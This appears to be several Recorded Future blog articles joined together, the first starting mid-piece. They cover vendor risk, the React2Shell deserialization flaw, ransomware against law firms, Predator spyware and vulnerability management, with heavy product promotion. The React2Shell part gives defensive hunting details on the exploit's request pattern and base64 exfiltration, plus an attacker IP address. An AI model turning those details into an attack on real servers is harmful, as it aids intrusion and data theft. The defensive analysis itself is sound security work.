The Scenario: A critical software vulnerability (often a zero-day) is discovered in a common component that many of your vendors use. It could be an open-source library, a popular IT tool, or a cloud service. You have no direct visibility that your suppliers rely on this component. Attackers quickly develop an exploit and start compromising organizations at scale via this flaw, long before most victims even realize they’re exposed through their third parties.

Real-World Example: The MOVEit Transfer zero-day (exploited by the Cl0p ransomware group) and the Log4j “Log4Shell” vulnerability are perfect examples of this risk. In the case of MOVEit, a single bug in a widely used file-transfer product led to the mass theft of data from thousands of companies, many of whom weren’t even direct customers of MOVEit, but their vendors were. Similarly, the Log4j flaw impacted countless businesses indirectly because software used by their contractors and providers included the vulnerable library.

Why Traditional Methods Fail: This is fundamentally a technology visibility problem. A point-in-time survey asking your vendors “Do you use MOVEit?” is too little, too late. By the time you send out a questionnaire and get a reply (if you get one at all), attackers may have already exploited the vulnerability and exfiltrated data. No organization can manually track every piece of software in their extended vendor ecosystem through periodic check-ins. In the MOVEit incident, many companies had no idea they were at risk until news of data breaches surfaced. Traditional vendor risk management simply isn’t designed to monitor technical exposure in real time.

The Intelligence-Led Solution: Defending against widespread vulnerabilities requires connecting two dots instantly: what’s vulnerable and who in your supply chain is using it. This is where an intelligence platform shines. Recorded Future’s approach combines technical attack surface intelligence with real-time vulnerability tracking. It continuously scans the internet to map out the external-facing tech stack of your third parties. The moment a new critical vulnerability is disclosed, Recorded Future’s intelligence automatically checks which of your vendors are running that technology. You receive an immediate, prioritized alert such as: “CRITICAL: 15 of your third-party vendors are exposing servers running [the vulnerable software]. Prompt them to apply patches or mitigations immediately.”

Type 3: The Fourth-Party & Concentration Risk

The Scenario: Sometimes the biggest risk in your vendor ecosystem isn’t with your direct third parties, but with their key dependencies. A “fourth party” is a vendor of your vendor, and if one that many of your critical vendors rely on goes down, it can create a single point of failure. A single outage can cascade up the chain, disrupting operations even when direct vendors appear secure.

Real-World Example: The 2021 ransomware attack on Kaseya’s VSA remote monitoring and management platform is a textbook case. Kaseya primarily served managed service providers (MSPs), who in turn delivered IT services to thousands of downstream customers. When attackers exploited Kaseya VSA, they were effectively able to push ransomware out through those MSPs to many organizations that had no direct relationship with Kaseya at all—they only “knew” their MSP. A single fourth-party dependency became the pivot point for a broad, multi-industry disruption.

Why Traditional Methods Fail: If you looked at each of your primary (third-party) vendors in isolation, they all might have passed your security reviews with flying colors. What the traditional assessment missed was that ten of those vendors all relied on the same subcontractor for a critical function, a critical audit blind spot. Most organizations only discovered their exposure to Kaseya after MSP-delivered systems were already encrypted. Without continuous visibility into your vendors’ vendors, this kind of concentration risk remains invisible until it’s too late.

The Intelligence-Led Solution: The only way to manage fourth-party and concentration risk is through continuous mapping of your vendors’ vendors, coupled with dynamic risk scoring. Recorded Future’s Third-Party Intelligence solution automatically identifies and maps these Nth-party relationships throughout your supply chain. In practice, this means if a critical fourth-party suffers a breach, you won’t be finding out via the news days later. Instead, your intelligence dashboard would immediately show that entity’s risk score spiking from, say, a modest 50 to a critical 99. This timely insight gives you a head start to activate business continuity and incident response plans. You immediately know exactly which of your vendors are impacted and can work to contain the fallout.

Type 4: The Vendor Credential Compromise

The Scenario: Not all third-party attacks involve sophisticated malware or supply chain tampering. Sometimes hackers just log in through the front door. In this scenario, a threat actor steals valid credentials from one of your vendors and uses those to access your systems. Perhaps an employee at a smaller, “low-risk” vendor, like an HVAC contractor, falls victim to a phishing email or unknowingly runs info-stealer malware on their laptop. Their VPN login or application credentials to your network get quietly harvested and sold on the dark web. An attacker buys the login, bypasses your multi-factor authentication, and walks into your network posing as a legitimate third-party user.

Real-World Example: This tactic was at the heart of the high-profile 2023 breaches of MGM Resorts and Caesars Entertainment, where attackers initially gained access via a third-party IT support vendor’s compromised VPN credentials.

Why Traditional Methods Fail: A vendor security questionnaire cannot prevent an individual at a partner company from clicking a phishing link or using a weak password. Your vendor might have all the right policies on paper, but those policies are irrelevant the moment an attacker has a valid username and password in hand. Traditional TPRM programs are about vetting a vendor’s security controls and compliance, but they don’t provide real-time awareness of things like a password leak or dark web sale of access related to that vendor.

The Intelligence-Led Solution: The key to stopping a credential-based breach is catching those compromised credentials before they are used against you. This calls for continuous identity-centric intelligence. Recorded Future’s Third-Party Intelligence module includes automated monitoring of a wide range of sources, from dark web forums to infostealer logs and criminal marketplaces, specifically watching for any mention of your organization’s partners and their accounts. The moment a set of credentials associated with one of your vendors appears in an illicit context, you receive a high-priority alert. Your team can immediately revoke or reset that vendor account and investigate the extent of access. This is the definition of proactive defense: you’re effectively shutting the door on the attacker before they can walk through it.

Type 5: The Operational & Financial Instability Risk

The Scenario: Sometimes the greatest third-party risk is a vendor’s operational or financial collapse. Consider a scenario where a critical vendor suddenly encounters a non-cyber crisis like bankruptcy, a major lawsuit or regulatory sanction, a natural disaster, or even a geopolitical event that halts their business. From your security team’s perspective everything looked fine, but virtually overnight this partner’s failure threatens to grind your business to a halt.

Real-World Example: A headline-grabbing case occurred with the sudden collapse of Silicon Valley Bank (SVB) in March 2023. SVB wasn’t attacked by hackers; it suffered a bank run and shut down in a matter of days. Companies that used SVB as a banking partner or for credit found themselves unable to access funds or process payroll, creating a cascade of operational and financial issues.

Why Traditional Methods Fail: A standard security questionnaire or compliance-focused vendor review is utterly blind to this category of risk. Your CISO’s third-party risk process likely doesn’t include reviewing a vendor’s financial statements or monitoring news about their executives’ legal troubles—nor should it, in a traditional model, since those are outside the classic IT security scope. As a result, organizations were caught off-guard by SVB’s collapse. A vendor that looked perfectly green from a security control standpoint turned out to be a huge business continuity threat. This kind of event exposes an “edge case” risk that isn’t an edge case at all: vendors can introduce strategic and financial risks that security teams and vendor managers often aren’t tracking.

The Intelligence-Led Solution: Truly comprehensive third-party risk management means monitoring all-source intelligence on your vendors, not just cyber indicators. Recorded Future’s Third-Party Intelligence platform is built to ingest and analyze a broad spectrum of data about companies. This includes real-time monitoring of global news media, credit ratings and financial filings, changes in executive leadership, legal filings, sanctions lists, regulatory watchlists, and more. By defining “risk” holistically, the platform can alert you to significant non-cyber events that may impact your vendors. These signals give your security, risk, and procurement teams time to react, whether that means activating contingency plans, finding alternate suppliers, or engaging leadership to address the issue.

The Solution: Move from “Trust” to “Continuous Verification”

The five examples share a theme: “trust” is not a control. Vendor attestations and annual audits don’t capture rapidly changing third-party conditions—exploits, credentials, dependencies, and financial shocks. To answer why third-party risk management is important: it’s no longer a “vendor” problem. It’s your attack surface, your data, and your reputation on the line.

This is why security leaders are shifting from a trust-but-verify model to a model of continuous verification, replacing blind trust with live intelligence.

Moving to continuous verification means supplementing or replacing periodic vendor check-ins with real-time intelligence and automation. This is where Recorded Future’s approach comes in. Recorded Future acts as a “risk radar” that’s always on, giving you a 360-degree, real-time view of your third-party ecosystem. It uniquely integrates multiple intelligence streams—threat intelligence, attack surface intelligence, and third-party risk intelligence—into one platform.

• Know which CVEs matter today across your ecosystem with Vulnerability Intelligence and exploit-in-the-wild context.
• Detect compromised vendor access with Identity Intelligence and automated revocation workflows.
• Map fourth-party dependencies and track concentration with Third-Party Intelligence risk scoring.
• Operationalize all of this via integrations to SIEM/SOAR/EDR and GRC/TPRM workflows (e.g., ServiceNow) so that risk evidence triggers action.

Recorded Future is the only platform connecting disparate, live third-party intelligence into a single, real-time view that answers the question:

“Which of my vendors poses the greatest risk to my business—right now?”

Ready to replace point-in-time vendor questionnaires with continuous verification? Schedule a personalized demo, and our experts will show you how the Recorded Future platform provides a complete, real-time picture of your vendor ecosystem.

A critical vulnerability in React Server Components is allegedly being actively exploited by multiple Chinese threat actors, Recorded Future recommends organizations patch their systems immediately.

What's Happening

CVE-2025-55182, dubbed "React2Shell," affects React Server Components versions 19.0, 19.1.0, 19.1.1, and 19.2.0 in several Meta packages. Amazon's AWS Threat Intelligence team reported on December 4 that Chinese threat groups including Earth Lamia, Jackpot Panda, and several untracked clusters are actively exploiting this vulnerability. However, AWS has not provided any further evidence for these attributions beyond IP addresses allegedly used by these threat groups. At this stage, Insikt Group cannot exclude the possibility that the same threat group might still be using the IP address 206[.]237[.]3[.]150, but we are currently unable to verify AWS’s attribution to Earth Lamia.

The vulnerability stems from unsafe payload deserialization at React Server Function endpoints. When successfully exploited, attackers can execute arbitrary code through crafted HTTP requests, potentially leading to complete backend compromise.

CVE-2025-55182 (React2Shell) Intelligence Card®

There are now multiple publicly available exploit scripts (I forked one on GitHub here) for the React and Next.js vulnerabilities (CVE-2025-55182 and CVE-2025-66478).

The underlying issue is data serialization/deserialization, which evoked thoughts about a blog I wrote in 2016, addressing the same issue (at the time, the topic was CVE-2015-4852, a serialization flaw in Java objects that affected Oracle and Apache products).

Timeline illustrating the deserialization vulnerability impacts of 40+ critical CVEs across 6 ecosystems, over the course of 10 years.

2 Risk Takeaways

• The exploit pattern repeats because serialization is a straightforward method for transferring data, and developers typically use what works. Coders use different languages and frameworks, yet the same class of vulnerability persists. The upstream opportunity here is for universities to aggressively drive security into all programming courses.
• Everyone is a coder now, and security domain expertise has never been more important. Every business function will include AI-assisted coders, supercharging productivity and efficiency. LLMs don’t need to stop for human input, but understanding internet plumbing, tools, platforms, and security implications is now crucial. The most valuable employees can use AI for 10x+ impact AND catch potential issues as humans become the AI-copilots.

Technical Causation

• Serialization is seductive: It’s the easy path for passing complex objects across trust boundaries (client ↔ server, service ↔ service). Developers reach for it because it “just works” (until it catastrophically doesn’t).
• Framework abstraction hides the danger: Some percentage of Next.js developers using Server Actions are unaware that they’re invoking a custom serialization protocol. They’re calling a function. The risk is invisible until it’s exploited.
• The ecosystem never learns collectively: Java shops learned (painfully) about gadget chains and ObjectInputStream. However, that institutional knowledge didn’t necessarily transfer to Node.js/React developers building RSC implementations a decade later.

The Threat

The attack surface has expanded once again. In 2015, we were tracking exploit chatter on Chinese forums appearing weeks before CVEs. Now, there are double-digit public GitHub repositories with weaponized exploit code within days of disclosure. Agentic workflows will soon compress that window down to minutes. The time-to-exploitation will amount to the time defenders spend reading about any new high-severity vulnerability.

PoC exploit testing, c/o Recorded Future

Defender Considerations for CVE-2025-55182 / CVE-2025-66478

• Attackers differentiate vulnerable App Router targets from safe Pages Router sites by checking for window.__next_f vs __NEXT_DATA__. Your asset inventory should already know which flavor you’re running.
• The vulnerability lives in the Flight protocol deserialization. If you’re not using Server Actions, consider disabling them. If you are, the endpoint (Next-Action header targets) is where to focus WAF rules.
• Hunt for anomalous POST requests with Next-Action headers containing malicious multipart payloads targeting __proto__ or unusual serialized JSON structures. The exploit exfils via base64 in error digests.
• The core issue is in react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack. Custom RSC implementations outside Next.js are equally exposed.
• RCE means immediate credential harvesting from environment variables, lateral movement via cloud metadata endpoints, and persistence via scheduled tasks or cron jobs. IR playbooks should assume full compromise.

AI-generated serialization vulnerability audit

For “Vibe Coders”: A Conversation with Claude Opus 4.5

Q: What’s a proper input validation methodology for deserializing data to avoid security failures?

A: Native serialization formats (Java ObjectInputStream, PHP unserialize, Python pickle, .NET BinaryFormatter) reconstruct objects with behavior, which means arbitrary code can execute during deserialization. The fix is using formats that only transfer data, not executable structures.

Safe alternatives:

1. Data-only interchange formats

• JSON (most common)
• Protocol Buffers (Google)
• FlatBuffers (zero-copy, fast)
• MessagePack (binary JSON, compact)
• CBOR (binary, IETF standard)

These parse into primitive types and structures—no object instantiation, no code execution.

2. Schema validation on top

• JSON Schema
• Zod / Yup (JavaScript)
• Pydantic (Python)
• marshmallow (Python)

Define exactly what shape the data must have. Reject anything that doesn’t match before your application logic ever sees it.

3. When you need objects, build them explicitly

Instead of:

obj = pickle.load(untrusted_data) # dangerous

Do:

data = json.loads(untrusted_data) # safe parse
obj = MyClass(**validated_schema(data)) # explicit construction

4. For config/markup

• TOML instead of YAML (no code execution tags)
• JSON5 for human-readable config
• Avoid YAML’s !!python/object or Ruby’s !ruby/object—or use safe loaders exclusively (yaml.safe_load())

The one-liner: If your serialization format can reconstruct arbitrary types, it’s a vulnerability. Stick to dumb data formats + explicit object construction.

Q: Do modern LLMs know how to securely validate data by default?
A: Technically, yes, practically, it’s complicated.

What’s in the training data:

• Security research, CVE databases, OWASP guidance
• Countless blog posts about pickle/unserialize dangers
• Secure coding documentation from every major vendor

So if you ask directly—”Is pickle safe for untrusted data?”—any decent LLM will say no.

The problem:

LLMs are also trained on millions of Stack Overflow answers, tutorials, and GitHub repos that use pickle.load(), unserialize(), and yaml.load() because they’re convenient. When someone asks, “How do I save this object to a file and load it later?” the pattern-match often lands on the dangerous-but-common approach.

What I’ve observed:

• Ask for “the fastest way” → often gets insecure code
• Ask for “production-ready” or “secure” → better results
• Ask without security context → coin flip

The real gap:

LLMs don’t reason about security—they predict likely tokens based on training. They won’t spontaneously say “wait, where is this data coming from?” the way an experienced developer might. The threat model isn’t automatic.

Practical advice for developers using LLM assistants:

• Explicitly ask for secure alternatives
• Ask “What are the security implications of this code?”
• Treat generated code like untrusted input—review it

So yes, the knowledge is in there. But so is a decade of insecure examples, and the LLM doesn’t inherently prioritize one over the other unless prompted.

Stay Ahead with Recorded Future

Learn how Recorded Future's Vulnerability Intelligence tracks CVE disclosures, monitors exploit availability across GitHub and underground forums, and prioritizes vulnerabilities based on active threats to your environment. The platform compresses your response window from days to hours.

Law firms, specifically, are particularly vulnerable to creating downstream risk impacts given the nature and purpose of legal services, and adversary targeting is on the rise.

The Industrial Consolidation of Legal Sector Attacks

The numbers paint a stark reality. Twenty % of US law firms were targeted by cyberattacks in the past year, with 56% of breached firms losing sensitive client information. The average breach cost reached $5.08 million, representing a 10% year-over-year increase that excludes long-term reputational damage and client defection.

Recorded Future’s AI Insights from 2025 service industry victims

RansomHub has emerged as 2025’s dominant threat after absorbing talent from disrupted groups like LockBit and ALPHV/BlackCat. By offering affiliates a 90/10 profit split versus the standard 70/30, they’ve attracted the most capable operators in the underground economy. Qilin’s Rust-based ransomware has specifically targeted legal entities with encryption-resistant payloads, making recovery nearly impossible.

Qilin ransomware profile c/o Recorded Future

The chart below, derived from Recorded Future analyst notes tracking ransomware extortion sites, illustrates the growth in ransomware targeting by industry, with legal firms remaining the number one target.

Ransomware victims industry comparison in 2024 and 2025.

These aren’t opportunistic attacks. Threat actors now maintain “dwell times” exceeding weeks inside firm networks, systematically identifying crown jewel intelligence before triggering extortion events. Industrialization means attackers understand exactly what creates maximum leverage: M&A intelligence during active deals, litigation strategies before trial, and decades of retained client data across multiple matters.

Recorded Future telemetry from the past quarter indicates that over 20 observed legal or legally adjacent firms have malware communicating with malicious command-and-control (C2) servers. While the observed traffic was 24 hours or less for some firms, other organizations saw persistence above 5 days. Certainly, a malicious implant does not equate to a full breach and exfiltration of client-sensitive data; however, it is a valuable signal to monitor for changes in third-party and fourth-party risk.

Infographic depicting recent malware dwell times in global legal firm victims

When Privilege Becomes Your Adversary’s Weapon

Courts have systematically eroded attorney-client privilege protection for breach investigations, creating a dangerous trap where forensic reports become ammunition for adversaries. The Capital One decision ordered production of Mandiant’s forensic report because the investigator served “business purposes” rather than pure legal advice.

The cascade accelerates through “sword and shield” waiver doctrine. Any use of breach investigation findings, even citing them in discovery responses, can trigger a subject matter waiver, requiring disclosure of all privileged communications related to threat assessment and remediation strategy. The 2024 Samsung Data Breach ruling made this explicit: sharing reports with 15 executives indicated business decision-making use, defeating privilege.

Federal Rule of Evidence 502 creates additional exposure when companies share incident reports with regulators. The 2023 Covington & Burling case saw the SEC subpoena the firm for names of 298 publicly-traded clients whose data “may have been exfiltrated,” though a court eventually ruled that only seven clients had to be named, it did establish that law firms cannot completely shield client identity from regulators, and those clients could then face SEC investigation for failure to disclose their counsel was breached.

M&A Intelligence Monetization at Scale

When Berkeley Research Group was hit by ransomware in March 2025 during a $700 million leveraged buyout by TowerBrook Capital Partners, the attack exposed M&A intelligence across hundreds of concurrent deals. This wasn’t just data theft; it was a systematic opportunity for market manipulation.

Academic research quantifies the damage. The Intralinks/Cass Business School study found 8-10% of M&A deals leak annually, with leaked deals achieving 47% median premiums versus 27% for non-leaked deals, which is a 20 percentage point difference worth millions per transaction. Only 49% of leaked deals complete versus 72% of non-leaked deals.

The Tyler Loudon case (2024) demonstrated the benefits of access when the defendant stole M&A information from his attorney wife, resulting in insider trading charges.

The Systematic Failure to Assess Professional Services Risk

Only 30% of law firms report clients asking them to complete security questionnaires (not that attestations are a wholly competent method for determining exposure risk), compared to a near-universal requirement for SaaS vendors. This exemption culture may stem from relationship bias and the misconception that “they’re not a tech vendor” despite law firms operating technology-intensive businesses.

The data concentration goes untracked. A single firm may hold M&A details, employee PII, trade secrets, litigation strategies, regulatory issues, and executive compensation across multiple business units that operate independently. The Orrick breach (2023) exposed 637,000+ individuals precisely because the firm aggregated data from employment litigation, mergers and acquisitions (M&A) transactions, and patent filings.

Retention amnesia compounds the risk. Lawyers traditionally “keep everything forever” due to a risk-averse culture, and potential regulatory requirements. Data from cases in the 1990s may still exist on unpatched legacy servers. Each year of retention adds cumulative breach exposure, yet enterprises rarely ask law firms about deletion policies or data locations.

Strategic Actions for Enterprise Defense

Treating professional services firms as high-risk technology vendors requires structural changes to vendor management frameworks.

• Eliminate standing exemptions: Subject law and consulting firms to the same security requirements as SaaS vendors, including SOC 2 verification, independent audits, and quarterly assessments, without granting relationship-based waivers.
• Map concentration risk: Identify all professional services vendors with data access across business units. Calculate total organizational exposure when single firms hold aggregated intelligence across HR, legal, finance, and compliance matters.
• Audit fourth-party dependencies: Require disclosure of critical vendors, including MSPs, cloud providers, SaaS vendors, and document management systems. A breach of fourth-party infrastructure becomes your breach through the use of API tokens, credential harvesting, and VPN pivoting.
• Establish time-bound access: Implement purpose-limited credentials that expire at the conclusion of a matter. Eliminate long-lived access that persists in engagement reports and consulting code repositories.
• Define retention requirements: Specify data deletion periods in contracts with confirmation requirements. Audit compliance quarterly, as many firms retain data indefinitely on legacy systems.
• Deploy breach detection: Place honeytokens in systems accessible to professional services firms. Establish 24-48 hour notification SLAs with emergency credential rotation capabilities.
• Create specialized incident response protocols: Develop playbooks specifically for law firm breaches addressing privilege complications, litigation exposure assessment, and regulatory notification requirements.
• Use threat intelligence to map services firms’ domain and IP space. Use the infrastructure map to monitor and alert on observed traffic between malware implants and command-and-control (C2) infrastructure. Recorded Future's Third-Party Intelligence automates this monitoring across your entire vendor ecosystem, providing real-time alerts when professional services firms show compromise indicators. Combined with Ransomware Mitigation capabilities, organizations can track ransomware group TTPs, monitor extortion sites, and receive early warnings when vendors appear on leak sites. Immediately notify affected service providers, disable organizational access, and assist in remediation.

Wrap-Up

The evidence from 2025 makes the stakes undeniable. With 21 law firm breaches in just the first five months of 2024 and incidents like Williams & Connolly’s nation-state compromise and Berkeley Research Group’s ransomware during active M&A, the pattern is clear.

When your law firm holding decades of critical data gets breached, you don’t have a vendor incident. You have a strategic intelligence compromise with multi-year competitive implications that traditional third-party risk frameworks didn’t adequately contemplate, as they exempt “trusted advisors” from the security scrutiny their data concentration demands. The shift from relationship-based trust to risk-based verification isn’t optional; it’s survival.

Learn how Recorded Future's Ransomware Mitigation and Third-Party Intelligence solutions work together to protect against cascading vendor risk. From tracking ransomware groups targeting legal firms to monitoring your vendors for real-time compromise indicators, you can detect and respond to vendor compromises before they cascade into your organization.

NOTE: This was updated on February 20, 2026, with a minor correction.

Executive Summary

Insikt Group identified several individuals and entities linked to Intellexa and its broader network of associated companies. These connections span technical, operational, and corporate roles, including backend development, infrastructure setup, and company formation. Using export and import data, Insikt Group identified one entity linked to the previously reported Czech cluster that facilitated the shipment of Intellexa products to clients. In at least one instance, a direct delivery was made to an end user, while additional entities in Kazakhstan and the Philippines appear to have been involved in product imports, indicating an expanding network footprint. Two additional entities in the advertising sector may be tied to the “Aladdin” ad-based infection vector, previously associated with the Czech cluster via a leaked 2022 invoice. In addition, Recorded Future’s proprietary intelligence revealed ongoing Predator spyware activity in multiple countries, including new evidence of its deployment in Iraq.

The continued domestic use of mercenary spyware such as Predator poses significant privacy, legal, and physical security risks worldwide. Although civil society remains the primary target in most publicly documented cases, recent evidence shows that executives and other high-profile individuals with substantial intelligence value are increasingly being targeted as well. Due to Predator’s costly licensing model, operators are likely to reserve its deployment for high-value strategic targets, placing politicians, business leaders, and individuals in sensitive roles at heightened risk. Meanwhile, the widespread and likely unlawful use of spyware against political opposition continues to be a pressing issue under investigation in several European Union (EU) member states, including Poland and Greece.

Insikt Group assesses that several key trends are shaping the spyware ecosystem, including growing balkanization as companies split along geopolitical lines, with some sanctioned entities seeking renewed legitimacy through acquisitions while others shift toward regions with weaker oversight (1, 2). Despite this, a core network of facilitators continues to underpin the industry’s operations. Furthermore, rising competition and secrecy surrounding high-value exploit technologies are heightening risks of corruption, insider leaks, and attacks on spyware vendors themselves. Targeting has also expanded beyond traditional civil society figures to include corporate leaders and private-sector individuals (1, 2), suggesting that the publicly visible cases represent only a fraction of a much larger, concealed global ecosystem.

Key Findings

• Insikt Group uncovered additional companies highly likely tied to Intellexa’s broader corporate web, particularly within the previously discussed Czech cluster. At least one of these entities appears to have been used to ship Intellexa products to clients, offering further insight into Intellexa's global business structures.
• Two newly identified companies appear to operate in the advertising sector and may be connected to a previously reported ad-based infection vector known as “Aladdin.” This vector was earlier associated with the Czech cluster through a leaked invoice from 2022 showing payments for a proof-of-concept to an individual linked to that cluster.
• Analysis of export and import databases revealed indications that one of the newly identified companies was used to deliver Intellexa products to end customers, either directly or through intermediaries. This research also exposed two additional entities located in Kazakhstan and the Philippines.

• Traditional vulnerability management (VM) overwhelms teams with undifferentiated findings; integrating threat intelligence adds real-world context so you can fix what’s actually being targeted first.
• Threat intelligence-enriched, risk-based prioritization reduces MTTR, aligns with business risk, and moves programs from reactive to proactive.
• A modern approach uses automated risk scoring, dashboards, and workflow integrations to operationalize intelligence inside existing VM processes.
• Recorded Future’s Vulnerability Intelligence provides real-time risk scoring, exploitability insights, and integrations with leading VM platforms to drive action.

Introduction

In today’s threat landscape, security teams struggle under the growing challenge of vulnerability overload. Dozens of new CVEs are disclosed daily, spanning a wide diversity of technologies—over 40,000 were published in 2024 alone. Without strong organization, prioritization, and visibility, this flood of vulnerabilities can overwhelm remediation teams and leave truly dangerous gaps unaddressed. Teams need a way to separate noise from risk and focus effort where it counts. Without comprehensive visibility and well-defined workflows, organizations have no way of knowing which vulnerabilities matter most, and remediation stalls.

Risk-based prioritization—especially when grounded in threat context—keeps patching aligned with real-world attacker activity and an organization’s most critical assets. This is where threat intelligence changes the game. By adding insight on active exploits, attacker interest, and malware associations to vulnerability data, teams can identify which issues are actively being targeted and prioritize those first. The result is a modern, intelligence-driven approach to vulnerability management that bridges the gap between endless vulnerability lists and actual risk reduction.

Understanding Threat Intelligence and Vulnerability Management

Before organizations can modernize their approach to vulnerability management, it’s important to understand the two core disciplines involved, and the limitations that emerge when they operate independently. Threat intelligence and vulnerability management are both essential to reducing cyber risk, but too often weak integration keeps teams from acting on intelligence to actually get ahead of critical vulnerabilities. To appreciate the value of integrating threat intelligence with vulnerability management, let’s define each discipline and their traditional limitations:

• Threat Intelligence: Threat intelligence refers to curated information about malicious actors, their tactics, and emerging attacks that helps defenders make informed decisions. Threat Intelligence encompasses data on indicators of compromise, adversary techniques, and observed exploits in the wild. The goal is to understand the current threat landscape and anticipate how attackers might strike next.
• Vulnerability Management (VM): Vulnerability management is the process of systematically identifying, assessing, and remediating weaknesses (software bugs, misconfigurations, etc.) in an organization’s systems. Traditional VM programs rely on network scanners and inventory databases to discover vulnerabilities, assign severity scores (e.g. CVSS), and then patch or mitigate the issues based on priority. The standard VM cycle involves scanning for known CVEs, producing a list of findings, fixing what you can, and then rescanning to verify fixes.

The Limitations of Siloed Approaches

Performed in silos, a major gap exists between finding vulnerabilities and actually reducing risk. VM tools excel at detecting thousands of issues, but without threat context they can’t tell which of those hundreds of critical CVEs truly pose a real risk to your organization. This often leads teams to fix issues based purely on CVSS severity or ease of patching—a numbers-driven approach that may leave actively exploited vulnerabilities unpatched. Meanwhile, threat intelligence teams might be tracking dangerous new exploits or adversary campaigns, but if that intel isn’t linked to the VM process, it never informs patch prioritization. The two teams operate on parallel tracks, missing the synergy needed to combat real threats.

Without integrating threat intelligence and VM, there’s a dangerous disconnect—critical vulnerabilities may linger unaddressed because the VM team lacks insight into real-world threat activity, and threat intel may be under-leveraged without an established path to inform remediation efforts.

Challenges of Traditional Vulnerability Management

Even the most well-resourced teams struggle to keep pace with today’s vulnerability landscape. The sheer volume of findings, the limited context available, and the pressure to act quickly all create structural weaknesses in traditional VM programs. Key issues include:

An Overwhelming Volume of CVEs

Modern organizations face an avalanche of vulnerabilities. Each vulnerability scan can return hundreds or thousands of findings, and new CVEs are disclosed at a record pace every year. This sheer volume makes it impractical for teams to patch everything, but without further guidance, many vulnerability managers feel pressure to fix as much as possible and use raw counts of patched bugs as a success metric. The result is often firefighting and fatigue. Additionally, using volume-based metrics rather than those tied to impact reduces the credibility of your VM program.

Lack of Real-World Threat Context

Traditional VM programs typically prioritize based on static severity scores (CVSS) or vendor guidance, which show how critical a vulnerability would be if exploited, but do not reflect whether attackers are actively targeting it. A flaw might be rated 9.8 “critical” on CVSS, but if no threat actors are targeting it, it poses less immediate risk than a 7.0 “high” that’s being widely exploited in the wild. Without threat intelligence, vulnerability managers lack insight into which vulnerabilities are featured in exploit kits, mentioned on dark web forums, or being leveraged in recent breaches.

Resource Constraints in Remediation Teams

Most security and IT teams simply don’t have enough personnel or downtime to remediate every vulnerability promptly. Legacy vulnerability management often operates on a reactive model—scan, list, and attempt to patch—which can overwhelm teams. They must triage an endless queue of patches, schedule maintenance windows, and avoid disrupting critical systems. With limited staff, it’s common for patch backlogs to grow.

Reactive vs. Proactive Posture

Reactive approaches are driven by periodic scan reports or the latest security bulletin. Organizations may only discover a need to patch when the scanner flags a new CVE—or worse, when an incident responder finds that attackers exploited a missing patch. In fact, threat actors are getting faster at exploiting new flaws—it often takes only around 15 days for an exploit to appear in the wild once a vulnerability is disclosed . This means a purely reactive patch cycle leaves a dangerous exposure window. The key challenge is shifting out of react mode and into a more proactive, intelligence-informed strategy that addresses likely threats before they strike,ultimately helping to close those vulnerability gaps.

How Threat Intelligence Strengthens Vulnerability Management

Threat intelligence adds a critical dimension that traditional VM tools simply can’t provide: a real-time view of attacker behavior. This context transforms raw vulnerability data into something actionable, allowing teams to focus their attention on the issues that genuinely matter. By weaving threat intelligence into the VM lifecycle, organizations can meaningfully elevate their defenses.

By incorporating threat intelligence, vulnerability management teams gain up-to-the-minute awareness of which vulnerabilities are being actively exploited or discussed by attackers. Knowing that a given CVE is being used to target your industry, leveraged in ransomware attacks, or scanned for by adversaries elevates its priority dramatically. Such context allows you to focus remediation on the vulnerabilities most likely to impact your organization’s systems.

Meanwhile, intelligence enables a shift from a purely severity-based approach to a risk-based vulnerability management strategy. Instead of treating all “critical” CVEs as equal, teams combine internal asset criticality with external threat likelihood to calculate risk. By fusing threat intel (exploit availability, attacker interest, trending malware) with vulnerability data, organizations can remediate the vulnerabilities that pose the greatest real-world risk first, dramatically reducing the chances of breach.

With better prioritization and context, security teams can respond faster to the vulnerabilities most dangerous to their specific organization. Threat intelligence acts as an early-warning system. It can alert you to a new critical CVE that’s being weaponized in the wild days or weeks before official sources might highlight it. That lead time means patches or mitigations can be applied sooner, shrinking the window of exposure.

Finally, threat intelligence helps translate the technical details of vulnerabilities into business impact terms, improving communication with leadership and other stakeholders. By understanding which vulnerabilities could actually disrupt the business, security teams can better convey urgency to management and get support for emergency patches or downtime. Integrating threat intelligence also fosters alignment between the threat intel analysts and the vulnerability management/IT teams. Ultimately, intelligence-driven VM ensures that vulnerability prioritization maps to the organization’s highest risks and threat scenarios, rather than an abstract severity rating.

Benefits of an Integrated Cybersecurity Approach

Bringing threat intelligence and vulnerability management together doesn’t just streamline workflows — it reshapes how organizations reduce risk. Integrated programs operate with clearer priorities, faster response times, and better alignment across teams. Understanding these benefits helps illustrate why more enterprises are shifting toward a unified strategy.

Focused Resource Allocation (Focus on What Matters)

An integrated approach ensures your team’s limited time and effort are spent where it truly counts. Rather than patching vulnerabilities arbitrarily or in numeric order, you can concentrate on the subset that intelligence deems most dangerous. This better allocation of resources means important patches happen faster, and staff aren’t burning cycles on low-risk items.

Proactive Risk Mitigation

Combining threat intelligence with vulnerability management transforms the program from reactive to proactive. You’re not just responding to scanner reports or waiting for a breach to highlight a missed patch. You’re actively watching threat trends and preemptively fortifying systems against likely attacks. This proactive risk mitigation can stop incidents before they occur.

Improved Reporting and Compliance

An intelligence-informed VM process provides richer data for reporting up to executives or auditors. Security leaders can demonstrate not just how many vulnerabilities we patched, but justify how the fixes implemented strategically reduce risk to critical assets and keep the organization ahead of active threats. Additionally, integrating threat intelligence can strengthen compliance posture by ensuring that high-risk vulnerabilities (which often map to regulatory red flags) are dealt with promptly, thereby addressing key requirements in standards like ISO 27001, NIST CSF, or industry-specific guidelines.

Cross-Team Collaboration

When threat intelligence and vulnerability management are integrated, it breaks down silos between the teams that discover threats and those that fix them. Intelligence analysts, incident responders, vulnerability managers, and IT operations start to work from a common playbook informed by shared data. Threat intel might flag a critical new exploit; the VM team then rapidly assesses exposure and deploys patches; IT ops coordinates any system impacts, all in a coordinated workflow.

Practical Steps for Integration

Integrating threat intelligence into your VM program doesn’t require a complete overhaul. It’s a series of deliberate, achievable improvements. The key is knowing where intelligence can enhance existing workflows and how to introduce automation without disrupting core processes. These actionable steps provide a roadmap for making that transition smoothly.

1. Map Existing Workflows: Begin by documenting your current vulnerability management process and how information flows (or doesn’t) between the VM team and threat intelligence team. Understand your scan schedule, patch management cycle, and how decisions are made. Similarly, map out how threat intelligence is collected and disseminated in your organization.
2. Integrate Threat Intelligence Feeds and Platforms: Connect external threat intelligence sources into your vulnerability management tooling. This can be done through threat intelligence feeds integrated directly into your VM software.
